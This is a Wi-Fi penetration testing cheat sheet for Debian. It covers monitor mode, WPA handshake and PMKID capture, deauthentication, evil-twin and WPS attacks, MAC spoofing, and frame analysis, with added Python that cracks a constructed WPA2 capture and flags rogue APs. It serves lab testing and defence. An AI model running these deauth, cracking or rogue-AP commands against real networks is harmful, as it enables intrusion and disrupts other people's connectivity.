wifi::pentest

pentest wireless aircrack · WPA
01 Quick Triage & Interface Discovery
Interfaces & capabilities
ip link
iw dev
iw phy
iwconfig
nmcli device status
rfkill list
ethtool -i wlan0            # driver, firmware version, bus-info

# Look for:
Supported interface modes: managed / monitor / AP
Supported Ciphers: CCMP / GCMP / TKIP
Supported commands: remain-on-channel, set-monitor, AP
Environment snapshot
uname -a
lsusb
lspci -nn | grep -i wireless
dmesg | grep -iE 'wlan|wifi|firmware|rtl|ath|mt76|iwlwifi'
journalctl -b | grep -iE 'wlan|wifi|NetworkManager|wpa_supplicant'

# Current config backup before testing
mkdir -p wifi-backup
cp -a /etc/NetworkManager wifi-backup/
cp -a /etc/wpa_supplicant wifi-backup/ 2>/dev/null
nmcli connection show > wifi-backup/nmcli-connections.txt
Capture sanity
tcpdump -D
airmon-ng
airmon-ng check
airmon-ng check kill          # only if you accept network disruption

# Minimal capture test (wlan0mon already in monitor mode; -I only asks libpcap to enable rfmon, harmless here)
timeout 10 tcpdump -i wlan0mon -I -nn -c 20
timeout 10 tshark -i wlan0mon -I -a duration:10

# If nothing appears:
wrong channel / no monitor mode / driver limitation / rfkill / DFS
02 Monitor Mode, Channels & Scanning
Enable monitor mode
# aircrack-ng route
airmon-ng start wlan0
airmon-ng start wlan0 6     # lock channel 6

# iw route
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up
iw dev wlan0 set channel 6

# Set channel width when needed
iw dev wlan0 set channel 36 HT20
Discovery
airodump-ng wlan0mon
wash -i wlan0mon                 # WPS
kismet -c wlan0
bettercap -iface wlan0mon
iw dev wlan0 scan | less         # active scan; needs a managed (not monitor) interface

# Lock a BSSID/channel
airodump-ng -c 11 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
5 GHz / 6 GHz notes
# Check allowed channels / regdom
iw reg get
sudo iw reg set BE               # example: Belgium; use the country code you are actually in

# DFS can delay or block capture/AP tests
Use non-DFS channels when possible for lab work.

# Hidden SSID
Passive capture + wait for probe/assoc, or induce reconnect:
aireplay-ng --deauth 5 -a BSSID wlan0mon
03 Capture, Handshakes, PMKID & Evil Twin
WPA/WPA2 handshake capture
airodump-ng --bssid BSSID -c CH -w handshake wlan0mon     # writes handshake-01.cap
aireplay-ng --deauth 10 -a BSSID -c CLIENT wlan0mon       # force one client to reconnect
aircrack-ng handshake-01.cap -w wordlist.txt

# Verify capture
aircrack-ng handshake-01.cap                              # look for "WPA (1 handshake)"
hcxpcapngtool -o hash.hc22000 handshake-01.cap            # hashcat -m 22000 format; accepts .cap and .pcapng
PMKID route
hcxdumptool -i wlan0mon -o dump.pcapng \
  --enable_status=1             # status options changed across hcxdumptool releases; check --help for yours
hcxpcapngtool -o hash.hc22000 dump.pcapng
hashcat -m 22000 hash.hc22000 wordlist.txt

# Notes
The PMKID is carried in the RSN IE of the AP's first EAPOL message (M1), so no client is needed,
but only APs that include it are exposed; many do not.
WPA3-SAE derives the PMK from the Dragonfly exchange, so a captured handshake or PMKID gives no
offline target; only the WPA2 fallback of transition-mode networks still does.
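What aircrack-ng and hashcat -m 22000 do with a capture, as an added example in plain Python (hashlib/hmac only; this is not code from the original page or from either tool). Every "captured" value is constructed in the script from a lab passphrase, and the MACs, nonces and wordlist are made up, so the two routes (PMKID, which needs only M1 from the AP; 4-way handshake, which needs ANonce from M1 plus the SNonce and MIC from M2) can be verified offline:

```python
# Added example, not from the original page: what "aircrack-ng / hashcat -m 22000" do offline,
# in plain Python (hashlib/hmac only). Every "captured" value below is constructed here from a
# lab passphrase so the check is reproducible; MACs, nonces and the wordlist are made up.
import hashlib
import hmac
import struct

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes). This is the cost."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA); sent by the AP in the RSN IE of M1."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]

def ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(AN,SN)||max(AN,SN))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]                      # KCK = [:16], KEK = [16:32], TK = [32:48]

def eapol_key_frame(key_info: int, nonce: bytes, mic: bytes = bytes(16), key_data: bytes = b"") -> bytes:
    """802.1X EAPOL-Key frame with the RSN key descriptor (type 2); MIC zeroed unless supplied."""
    body = struct.pack(">BHHQ", 2, key_info, 16, 1)         # descriptor type, key info, key length, replay ctr
    body += nonce + bytes(16) + bytes(8) + bytes(8)          # key nonce, key IV, key RSC, reserved
    body += mic + struct.pack(">H", len(key_data)) + key_data
    return struct.pack(">BBH", 2, 3, len(body)) + body       # EAPOL version 2, type 3 (Key), body length

MIC_OFF = 4 + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8               # = 81: offset of the MIC field in the frame

def mic_for(kck: bytes, frame: bytes) -> bytes:
    """Descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, EAPOL frame with the MIC zeroed)[:16]."""
    zeroed = frame[:MIC_OFF] + bytes(16) + frame[MIC_OFF + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def crack_pmkid(wordlist, target: bytes, ssid: str, ap_mac: bytes, sta_mac: bytes):
    """One PBKDF2 per candidate, then a single HMAC. Needs no client frames at all."""
    for pw in wordlist:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(pw, ssid), ap_mac, sta_mac), target):
            return pw
    return None

def crack_handshake(wordlist, m2: bytes, ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes):
    """Needs ANonce (from M1) plus M2 (SNonce + MIC): the minimum usable 4-way handshake capture."""
    snonce, captured_mic = m2[17:49], m2[MIC_OFF:MIC_OFF + 16]
    for pw in wordlist:
        kck = ptk(pmk_from_passphrase(pw, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(mic_for(kck, m2), captured_mic):
            return pw
    return None

# --- constructed "capture" ---------------------------------------------------------------
SSID = "lab-ap"
AP_MAC = bytes.fromhex("aabbccddeeff")            # made-up lab addresses
STA_MAC = bytes.fromhex("112233445566")
ANONCE = hashlib.sha256(b"constructed anonce").digest()
SNONCE = hashlib.sha256(b"constructed snonce").digest()
_pmk = pmk_from_passphrase("labpassword", SSID)   # the secret the attacker does not know
CAPTURED_PMKID = pmkid(_pmk, AP_MAC, STA_MAC)
KEY_INFO_M2 = 0x010A                              # descriptor v2 | pairwise | MIC bit
CAPTURED_M2 = eapol_key_frame(KEY_INFO_M2, SNONCE,
                              mic=mic_for(ptk(_pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16],
                                          eapol_key_frame(KEY_INFO_M2, SNONCE)))
WORDLIST = ["password", "letmein", "labpassword", "correcthorsebattery"]

if __name__ == "__main__":
    print("PMKID route    :", crack_pmkid(WORDLIST, CAPTURED_PMKID, SSID, AP_MAC, STA_MAC))
    print("handshake route:", crack_handshake(WORDLIST, CAPTURED_M2, SSID, AP_MAC, STA_MAC, ANONCE))
```

The expensive step in both routes is the PBKDF2 (4096 HMAC-SHA1 rounds per candidate, per SSID), which is why hashcat and GPUs matter and why SSID-specific wordlists beat generic ones. Neither check applies to WPA3-SAE, where the PMK does not come from the passphrase via PBKDF2.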
Evil twin / rogue AP
airbase-ng -e "FreeWifi" -c 6 wlan0mon
hostapd-wpe hostapd-wpe.conf
bettercap -iface wlan0mon
wifi.recon on
wifi.deauth all

# Safer lab setup
Use an isolated lab, dedicated RF shielded space, or attenuators.
Avoid deauth on networks you do not own / control.
04 802.11 Frame Analysis, Radiotap & Wireshark/Tshark
Frame classes
# Management
Beacon / Probe Req / Probe Resp / Auth / Assoc / Deauth / Disassoc

# Control
RTS / CTS / ACK / Block Ack

# Data
QoS Data / Null / EAPOL

# Useful filters
wlan.fc.type == 0        # management
wlan.fc.type == 1        # control
wlan.fc.type == 2        # data
eapol                     # handshake packets
wlan.addr == aa:bb:cc:dd:ee:ff
Radiotap essentials
# Radiotap = capture metadata from your adapter/driver
Common fields:
radiotap.channel.freq
radiotap.dbm_antsignal
radiotap.dbm_antnoise
radiotap.rate
radiotap.flags.shortgi
radiotap.mcs.index
radiotap.he.data_*
Tshark pivots
tshark -r wifi.pcapng -Y eapol
tshark -r wifi.pcapng -Y 'wlan.fc.type_subtype == 0x08'   # beacons (quote the filter for the shell)
tshark -r wifi.pcapng -T fields -e wlan.sa -e wlan.da -e wlan.bssid
tshark -r wifi.pcapng -T fields -e radiotap.dbm_antsignal
tshark -r wifi.pcapng -q -z io,phs

# Deauth / disassoc hunting
tshark -r wifi.pcapng -Y 'wlan.fc.type_subtype == 0x0c || wlan.fc.type_subtype == 0x0a'
Signal & roaming clues
Low RSSI + retries + reassoc bursts
→ weak link / roaming / evil twin suspicion

Sudden RSSI change with same BSSID
→ closer rogue AP / adapter moved / multi-AP environment
Hidden SSID recovery
Look for Probe Request / Assoc Request / Reassoc frames.
SSID often appears when a client reconnects.
Filter (assoc req 0x00, reassoc req 0x02, probe req 0x04, only frames carrying an SSID):
wlan.ssid && wlan.fc.type_subtype in {0x00 0x02 0x04}
EAPOL quick checklist
Need the 4-way handshake pieces: M1 + M2 is the minimum (ANonce, SNonce, MIC); M2 + M3 also works.
Check ANonce / SNonce presence and that the two messages belong to the same exchange (replay counter).
Capture quality matters more than packet count: one clean pair beats thousands of retries.
Prefer pcapng for metadata retention.
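The frame classes, display filters, radiotap fields and the hidden-SSID / EAPOL checks above, as one small decoder. This is an added example in pure Python (struct only), not code from the original page or from Wireshark; the four frames are constructed in the script, not captured, and the MACs and SSID are made up. It shows where in the bytes each tshark field actually lives:

```python
# Added example, not from the original page: a minimal radiotap + 802.11 decoder in pure Python
# (struct only), built from the frame classes, filters and radiotap fields listed above.
# The four frames below are constructed in this script, not captured; MACs are made up.
import struct

# radiotap present bits we decode: bit -> (size, alignment). Fields are naturally aligned
# relative to the start of the radiotap header; an unknown bit stops field parsing, but it_len
# still tells us where the 802.11 header begins.
_RT_FIELDS = {0: (8, 8), 1: (1, 1), 2: (1, 1), 3: (4, 2), 4: (2, 2), 5: (1, 1), 6: (1, 1)}
_MGMT = {0x0: "assoc-req", 0x1: "assoc-resp", 0x2: "reassoc-req", 0x4: "probe-req",
         0x5: "probe-resp", 0x8: "beacon", 0xA: "disassoc", 0xB: "auth", 0xC: "deauth"}
_IE_SKIP = {"beacon": 12, "probe-resp": 12, "probe-req": 0, "assoc-req": 4, "reassoc-req": 10}
_LLC_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"     # LLC/SNAP header with EtherType 0x888e

def parse_radiotap(buf: bytes):
    """Return (metadata dict, offset of the 802.11 header)."""
    version, _pad, length, present = struct.unpack_from("<BBHI", buf, 0)
    if version != 0 or present & (1 << 31):
        raise ValueError("unsupported radiotap header (version or extended present bitmap)")
    meta, off = {}, 8
    for bit in range(31):
        if not present & (1 << bit):
            continue
        if bit not in _RT_FIELDS:
            break
        size, align = _RT_FIELDS[bit]
        off = (off + align - 1) // align * align
        raw = buf[off:off + size]
        if bit == 2:
            meta["rate_mbps"] = raw[0] / 2                       # 500 kbps units
        elif bit == 3:
            meta["channel_freq"], meta["channel_flags"] = struct.unpack("<HH", raw)
        elif bit == 5:
            meta["dbm_antsignal"] = struct.unpack("<b", raw)[0]  # signed dBm
        elif bit == 6:
            meta["dbm_antnoise"] = struct.unpack("<b", raw)[0]
        off += size
    return meta, length

def parse_ies(body: bytes) -> dict:
    """Information Elements: id(1) len(1) value."""
    ies, i = {}, 0
    while i + 2 <= len(body):
        ies[body[i]] = body[i + 2:i + 2 + body[i + 1]]
        i += 2 + body[i + 1]
    return ies

def eapol_message_number(key_info: int) -> int:
    """4-way handshake message from Key Information bits: pairwise(3) install(6) ack(7) mic(8) secure(9)."""
    pairwise, install, ack, mic, secure = ((key_info >> b) & 1 for b in (3, 6, 7, 8, 9))
    if pairwise and ack and not mic:                return 1
    if pairwise and mic and not ack and not secure: return 2
    if pairwise and ack and mic and install:        return 3
    if pairwise and mic and secure and not ack:     return 4
    return 0

def parse_80211(frame: bytes) -> dict:
    fc0, fc1 = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    rec = {"type": ftype, "subtype": subtype, "protected": bool(fc1 & 0x40),
           "addr1": mac(frame[4:10]), "addr2": mac(frame[10:16]), "addr3": mac(frame[16:22]),
           "seq": struct.unpack_from("<H", frame, 22)[0] >> 4}    # 12-bit sequence number
    off = 24 + (6 if ftype == 2 and (fc1 & 0x3) == 0x3 else 0)    # addr4 only when ToDS and FromDS
    off += 2 if ftype == 2 and subtype & 0x8 else 0               # QoS control
    body = frame[off:]
    if ftype == 0:
        rec["kind"] = _MGMT.get(subtype, f"mgmt-{subtype:#x}")
        if rec["kind"] in _IE_SKIP:
            ssid = parse_ies(body[_IE_SKIP[rec["kind"]]:]).get(0, b"")
            rec["ssid"] = ssid.decode(errors="replace") or None   # None = hidden / wildcard
        elif rec["kind"] in ("deauth", "disassoc"):
            rec["reason"] = struct.unpack_from("<H", body, 0)[0]
    elif ftype == 1:
        rec["kind"] = "control"
    elif not rec["protected"] and body[:8] == _LLC_EAPOL:
        rec["kind"] = "eapol-key"                                  # key info sits after LLC(8)+EAPOL hdr(4)+type(1)
        rec["eapol_msg"] = eapol_message_number(struct.unpack_from(">H", body, 13)[0])
    else:
        rec["kind"] = "data"
    return rec

def decode(frames):
    out = []
    for raw in frames:
        meta, off = parse_radiotap(raw)
        rec = parse_80211(raw[off:])
        rec.update(meta)
        out.append(rec)
    return out

def recover_hidden_ssids(records) -> dict:
    """BSSIDs that beacon an empty SSID, named from probe/assoc requests addressed to them."""
    hidden = {r["addr3"] for r in records if r["kind"] == "beacon" and r["ssid"] is None}
    return {r["addr3"]: r["ssid"] for r in records
            if r["kind"] in ("probe-req", "assoc-req", "reassoc-req") and r.get("ssid") and r["addr3"] in hidden}

# --- constructed frames: radiotap (flags, 6 Mb/s, channel 6 = 2437 MHz, -61 dBm) + 802.11 ---
RT = struct.pack("<BBHI", 0, 0, 15, 0x2E) + bytes([0x00, 0x0C]) + struct.pack("<HH", 2437, 0x0480) + struct.pack("<b", -61)
AP, STA, BCAST = bytes.fromhex("aabbccddeeff"), bytes.fromhex("112233445566"), b"\xff" * 6
def _hdr(fc0, a1, a2, a3, seq, fc1=0):
    return struct.pack("<BBH", fc0, fc1, 0) + a1 + a2 + a3 + struct.pack("<H", seq << 4)
FRAMES = [
    RT + _hdr(0x80, BCAST, AP, AP, 100) + bytes(8) + struct.pack("<HH", 100, 0x0411) + bytes([0, 0, 3, 1, 6]),  # beacon, hidden SSID
    RT + _hdr(0x40, AP, STA, AP, 7) + bytes([0, 6]) + b"lab-ap" + bytes([1, 1, 0x0C]),                            # directed probe req
    RT + _hdr(0xC0, STA, AP, AP, 101) + struct.pack("<H", 7),                                                       # deauth, reason 7
    RT + _hdr(0x88, AP, STA, AP, 8, fc1=0x01) + bytes(2) + _LLC_EAPOL                                               # QoS data, EAPOL-Key M2
       + struct.pack(">BBH", 2, 3, 95) + struct.pack(">BH", 2, 0x010A) + bytes(92),
]

if __name__ == "__main__":
    for r in decode(FRAMES):
        print(r)
    print("hidden SSIDs:", recover_hidden_ssids(decode(FRAMES)))
```

The parser deliberately stops at radiotap bits it does not know how to size, which is the same reason a driver that "strips radiotap fields" leaves `radiotap.dbm_antsignal` empty in tshark: the present bitmap simply does not have bit 5 set.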
05 Common Attack Paths & Tools
Tool stack
# Classic
aircrack-ng / airmon-ng / airodump-ng / aireplay-ng / airbase-ng

# Modern capture + cracking
hcxdumptool / hcxpcapngtool / hashcat

# Discovery / monitoring
kismet / bettercap / wash / reaver / bully

# Packet analysis
wireshark / tshark / tcpdump / scapy
WPS / legacy
wash -i wlan0mon
reaver -i wlan0mon -b BSSID -vv
bully -b BSSID wlan0mon          # bully takes the interface as its last argument

# Notes
WPS is often disabled now, but still appears in old hardware / labs.
Treat it as target-dependent, not universal.
MAC spoofing / adapter identity
ip link set wlan0 down
macchanger -r wlan0              # random MAC; -m XX:XX:XX:XX:XX:XX sets a specific one
ip link set wlan0 up

# Restore hardware MAC (link must be down)
ip link set wlan0 down
macchanger -p wlan0
ip link set wlan0 up

# Beware
NetworkManager may also randomize MACs.
Persistent config matters when testing and when restoring.
06 AirSnitch Notes, Detection Ideas & Defensive Testing
What matters
AirSnitch focuses on bypassing Wi-Fi client isolation.
It is not "guess the password" and not classical crypto breaking.

Think in layers:
1. shared broadcast/group key abuse
2. IP-layer gateway bouncing
3. MAC spoofing / rebinding / port stealing style effects
4. cross-layer mismatch between isolation assumptions
Practical pentest takeaways
# Test assumptions, not just Wi-Fi auth
Can client A reach / influence client B despite "isolation"?
Can the gateway path be abused?
Do duplicate MAC conditions confuse the AP / bridge?
Can broadcast/ARP behavior reveal peer traffic paths?

# Lab clues to watch
Unexpected ARP replies
Frames to gateway MAC landing on attacker path
Duplicate / oscillating MAC-learning behavior
Peer-to-peer reachability despite isolation toggles
Mitigation-aware testing
Client isolation alone is not enough.
Segment guest / untrusted users into separate VLANs when possible.
Use PMF where supported.
Monitor duplicate MAC / spoofing behavior.
Prefer end-to-end protection (HTTPS, VPN, app-layer auth).

# For reports
Document AP model / firmware / client OS / regdom / channel / cipher.
Reproducibility matters.
07 WiFi + PCAP Correlation
Two useful capture models
# Model A: wireless-only
Monitor-mode pcapng from the air
Good for beacons, probes, EAPOL, deauth, radiotap, signal clues

# Model B: wireless + upstream ethernet
One capture on monitor interface + one on AP uplink / gateway
Good for correlating association events with IP/TCP activity
Correlation tips
Match by time first.
Then match by client MAC / IP / hostname / DHCP / DNS / TLS SNI.

# Useful pivots
assoc request → DHCP → DNS → HTTP/TLS
EAPOL → new IP flow burst
Deauth → reconnect → captive portal / auth flow

# Files
Prefer pcapng + synchronized clock on all capture systems.
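The pivots above (assoc → DHCP → DNS/TLS, deauth → reconnect) as a two-stage join, added here as an example that is not from the original page. Air-side events are keyed by client MAC, the uplink side by the IP that DHCP handed to that MAC, and each session is bounded by the client's next deauth or re-association. Both event lists are constructed to look like reduced tshark output; the addresses and hostnames are made up, and the `skew` parameter exists only to show what an unsynchronized clock does to the join:

```python
# Added example, not from the original page: the correlation pivots (assoc -> DHCP -> DNS/TLS,
# deauth -> reconnect) as a two-stage join. Both event lists are constructed; addresses and
# names are made up.

AIR = [                                   # (time, event, client MAC) from the monitor-mode capture
    (1700000100.0, "assoc-req", "11:22:33:44:55:66"),
    (1700000100.3, "eapol-m4",  "11:22:33:44:55:66"),
    (1700000140.0, "deauth",    "11:22:33:44:55:66"),
    (1700000142.0, "assoc-req", "11:22:33:44:55:66"),
    (1700000142.4, "eapol-m4",  "11:22:33:44:55:66"),
]
UPLINK = [                                # (time, proto, client MAC, client IP, detail) from the gateway capture
    (1700000101.1, "dhcp-ack", "11:22:33:44:55:66", "10.10.50.23", ""),
    (1700000101.5, "dns",      "",                  "10.10.50.23", "captive.example"),
    (1700000102.0, "tls",      "",                  "10.10.50.23", "portal.example"),
    (1700000143.2, "dhcp-ack", "11:22:33:44:55:66", "10.10.50.23", ""),
    (1700000143.9, "dns",      "",                  "10.10.50.23", "api.example"),
    (1700000170.0, "dns",      "",                  "10.10.50.99", "unrelated.example"),
]

def build_sessions(air, uplink, skew=0.0, window=30.0):
    """Stitch per-client sessions. `skew` (seconds) is added to uplink timestamps to correct a
    clock offset between the two capture hosts; `window` caps a session with no later air event."""
    air = sorted(air)
    up = sorted((t + skew, proto, mac, ip, detail) for t, proto, mac, ip, detail in uplink)
    sessions = []
    for i, (t0, ev, mac) in enumerate(air):
        if ev != "assoc-req":
            continue
        # the session ends at this client's next deauth or re-association on the air side
        end = next((t for t, e, m in air[i + 1:] if m == mac and e in ("deauth", "assoc-req")), t0 + window)
        s = {"mac": mac, "start": t0, "end": end, "ip": None, "flows": [],
             "handshake": any(e == "eapol-m4" and m == mac and t0 <= t <= end for t, e, m in air)}
        for t, proto, m, ip, detail in up:
            if not t0 <= t <= end:
                continue
            if proto == "dhcp-ack" and m == mac and s["ip"] is None:
                s["ip"] = ip                                            # stage 1: MAC -> IP
            elif s["ip"] and ip == s["ip"] and proto != "dhcp-ack":
                s["flows"].append((round(t - t0, 1), proto, detail))   # stage 2: IP -> flows
        sessions.append(s)
    return sessions

if __name__ == "__main__":
    for s in build_sessions(AIR, UPLINK):
        print(s)
```

With a 2 s clock error on the gateway box the DHCP ACK lands before the association and the first session gets no IP, which is the practical reason the page insists on synchronized clocks (or on measuring the offset from one event visible on both sides, such as the DHCP exchange itself).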
Tshark examples
# Wireless side
tshark -r wifi.pcapng -Y 'eapol || wlan.fc.type_subtype == 0x00 || wlan.fc.type_subtype == 0x02'

# Upstream side
tshark -r uplink.pcapng -Y 'dhcp || dns || http || tls'

# Merge if timestamps are aligned
mergecap -w merged.pcapng wifi.pcapng uplink.pcapng
Scapy quick decode
python3 - <<'EOF'
from scapy.all import rdpcap
p = rdpcap('wifi.pcapng')     # RadioTap / Dot11 layers are dissected automatically
p[0].summary()
p[0].show()
EOF
Beacon inventory
tshark -r wifi.pcapng -Y 'wlan.fc.type_subtype == 0x08' \
  -T fields -e wlan.bssid -e wlan.ssid -e radiotap.channel.freq | sort -u
Signal drift hunt
tshark -r wifi.pcapng -T fields -e frame.time_epoch -e wlan.sa -e radiotap.dbm_antsignal

Useful to spot sudden path changes or rogue closeness.
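The "signal & roaming clues" from section 04 and the signal drift hunt above, run as a script over tshark field output instead of by eye. This is an added example, not code from the original page. It assumes the rows were produced by `tshark -r wifi.pcapng -T fields -e frame.time_epoch -e wlan.fc.type_subtype -e wlan.sa -e wlan.bssid -e wlan.ssid -e wlan.seq -e radiotap.channel.freq -e radiotap.dbm_antsignal`; the lines in `SAMPLE` are constructed to look like that output (a real AP at -61 dBm, an impostor cloning its BSSID at -30 dBm with its own sequence counter, and a second BSSID advertising the same SSID on channel 11), and the MACs and SSID are made up:

```python
# Added example, not from the original page: the "signal drift" and "evil twin" hunts as a
# script over tshark -T fields output. SAMPLE is constructed; MACs and SSID are made up.
from collections import defaultdict

SAMPLE = """\
1700000000.10\t0x0008\taa:bb:cc:dd:ee:ff\taa:bb:cc:dd:ee:ff\tlab-ap\t100\t2437\t-61
1700000000.20\t0x0008\taa:bb:cc:dd:ee:ff\taa:bb:cc:dd:ee:ff\tlab-ap\t101\t2437\t-62
1700000000.30\t0x0008\taa:bb:cc:dd:ee:ff\taa:bb:cc:dd:ee:ff\tlab-ap\t2000\t2437\t-30
1700000000.40\t0x0008\taa:bb:cc:dd:ee:ff\taa:bb:cc:dd:ee:ff\tlab-ap\t102\t2437\t-61
1700000000.50\t0x0008\t66:55:44:33:22:11\t66:55:44:33:22:11\tlab-ap\t500\t2462\t-35
1700000001.00\t0x0028\t11:22:33:44:55:66\taa:bb:cc:dd:ee:ff\t\t40\t2437\t-70
"""
BEACON = 0x08                     # wlan.fc.type_subtype as printed by tshark (type<<4 | subtype)

def parse_tshark_fields(text: str):
    """Rows of the tab-separated -T fields output, sorted by time."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        t, ts, sa, bssid, ssid, seq, freq, rssi = line.split("\t")
        rows.append({"t": float(t), "ts": int(ts, 16), "sa": sa, "bssid": bssid, "ssid": ssid,
                     "seq": int(seq), "freq": int(freq), "rssi": int(rssi)})
    return sorted(rows, key=lambda r: r["t"])

def twin_candidates(rows):
    """Evil-twin shapes: one SSID from several BSSIDs, or one BSSID beaconing on several frequencies."""
    by_ssid, by_bssid = defaultdict(set), defaultdict(set)
    for r in rows:
        if r["ts"] == BEACON and r["ssid"]:
            by_ssid[r["ssid"]].add(r["bssid"])
            by_bssid[r["bssid"]].add(r["freq"])
    return {"ssid_multi_bssid": {s: sorted(b) for s, b in by_ssid.items() if len(b) > 1},
            "bssid_multi_freq": {b: sorted(f) for b, f in by_bssid.items() if len(f) > 1}}

def spoof_candidates(rows, rssi_jump=15, max_dt=1.0, seq_window=1024):
    """Per source MAC: an RSSI step of >= rssi_jump dB, or a 12-bit sequence counter that repeats
    or jumps by more than seq_window, within max_dt seconds, suggests two radios using one address."""
    last, hits = {}, []
    for r in rows:
        p = last.get(r["sa"])
        if p and r["t"] - p["t"] <= max_dt:
            if abs(r["rssi"] - p["rssi"]) >= rssi_jump:
                hits.append((r["t"], r["sa"], "rssi jump", p["rssi"], r["rssi"]))
            delta = (r["seq"] - p["seq"]) % 4096
            if delta == 0 or delta > seq_window:
                hits.append((r["t"], r["sa"], "seq anomaly", p["seq"], r["seq"]))
        last[r["sa"]] = r
    return hits

if __name__ == "__main__":
    rows = parse_tshark_fields(SAMPLE)
    print(twin_candidates(rows))
    for h in spoof_candidates(rows):
        print(h)
```

Thresholds are lab defaults: a genuine AP rarely moves 15 dB between two beacons 100 ms apart, and its sequence counter only advances by the frames it actually sent in that interval, so an independent counter on the same BSSID shows up as both an RSSI step and a sequence jump at the same instant. Tune `rssi_jump` up in noisy multi-path environments and treat a single hit as a lead, not a finding.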
08 Debian Lab Setup: STA, AP, Routing & Test Environment
Packages
sudo apt install \
  aircrack-ng hcxdumptool hcxtools hashcat wireshark tshark tcpdump \
  iw wireless-tools rfkill macchanger kismet \
  hostapd dnsmasq iptables nftables

# hcxpcapngtool ships in the hcxtools package; bettercap is not in Debian's repositories,
# install it from upstream releases (Kali packages it)
Simple AP lab (hostapd + dnsmasq)
# /etc/hostapd/hostapd.conf
# (driver= is required: the built-in default is the legacy hostap driver, not nl80211)
interface=wlan1
driver=nl80211
ssid=lab-ap
hw_mode=g
channel=6
auth_algs=1
wpa=2
wpa_passphrase=labpassword
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP

# /etc/dnsmasq.d/lab-ap.conf
# (bind-interfaces keeps dnsmasq off port 53 of every other interface, where systemd-resolved may sit)
interface=wlan1
bind-interfaces
dhcp-range=10.10.50.10,10.10.50.100,12h

# Address + services (Debian ships the hostapd unit masked after install)
ip addr add 10.10.50.1/24 dev wlan1
systemctl unmask hostapd
systemctl restart hostapd dnsmasq
Internet sharing for lab AP
# Example uplink: eth0, AP iface: wlan1
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i eth0 -o wlan1 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT

# nftables equivalent preferred on modern Debian if already in use
09 Return to a Working Debian Configuration After Testing
Stop test services & monitor mode
sudo systemctl stop hostapd dnsmasq 2>/dev/null
sudo airmon-ng stop wlan0mon 2>/dev/null

# If you used iw manually
sudo ip link set wlan0 down
sudo iw dev wlan0 set type managed
sudo ip link set wlan0 up

# Restore hardware MAC if changed (link must be down for macchanger)
sudo ip link set wlan0 down && sudo macchanger -p wlan0 && sudo ip link set wlan0 up
Undo IP forwarding / NAT
sudo sysctl -w net.ipv4.ip_forward=0
sudo iptables -t nat -F
sudo iptables -F FORWARD

# Or restore saved rules if you used them
sudo iptables-restore < saved.rules
sudo nft flush ruleset            # only if your system is not relying on nft rules
Bring desktop networking back
sudo systemctl restart NetworkManager
sudo systemctl restart wpa_supplicant 2>/dev/null
nmcli radio wifi on
rfkill unblock wifi
nmcli device wifi rescan
nmcli connection up "Your Saved SSID"

# If DNS broke
resolvectl status
sudo systemctl restart systemd-resolved 2>/dev/null
Good hygiene before tests
Save NM connection names.
Save iptables/nft rules.
Save MAC address.
Prefer a dedicated USB adapter for monitor mode.
Prefer a second adapter for AP mode.
Good hygiene after tests
Disable monitor mode.
Stop hostapd/dnsmasq.
Undo forwarding.
Restart NetworkManager.
Reconnect through nmcli.
Common failure cases
NetworkManager fighting hostapd
one adapter cannot do AP + monitor reliably
regdom/channel mismatch
MAC randomization confusion
stale dnsmasq or hostapd processes
10 Practical Workflow & Pitfalls
Workflow
1. Snapshot current Debian network state.
2. Identify adapter capabilities (managed / monitor / AP).
3. Use a dedicated monitor adapter when possible.
4. Scan and lock the correct channel/BSSID.
5. Capture pcapng, not only cap, to preserve metadata.
6. For pentest: choose handshake / PMKID / evil twin / isolation test path.
7. For analysis: pivot through beacons, EAPOL, deauth, radiotap signal, reassoc.
8. If correlating with upstream traffic, capture both air-side and gateway-side and merge on time.
9. Document AP model, firmware, channel, cipher, client OS.
10. Restore managed mode, MAC, routing, and NetworkManager before leaving the lab.
Pitfalls
Wrong channel
No monitor support
Driver strips radiotap fields
Capturing too late for handshake
Assuming WPA3 means no attack surface
CTF-specific use
Look for hidden SSID
Recover handshake / PMKID
Follow deauth timing
Correlate wireless events with DNS/HTTP pcaps
Extract flags from wireless-side metadata too
Reporting
State legal scope.
State RF setup.
List tools / versions.
Keep raw captures.
Keep a short restoration checklist.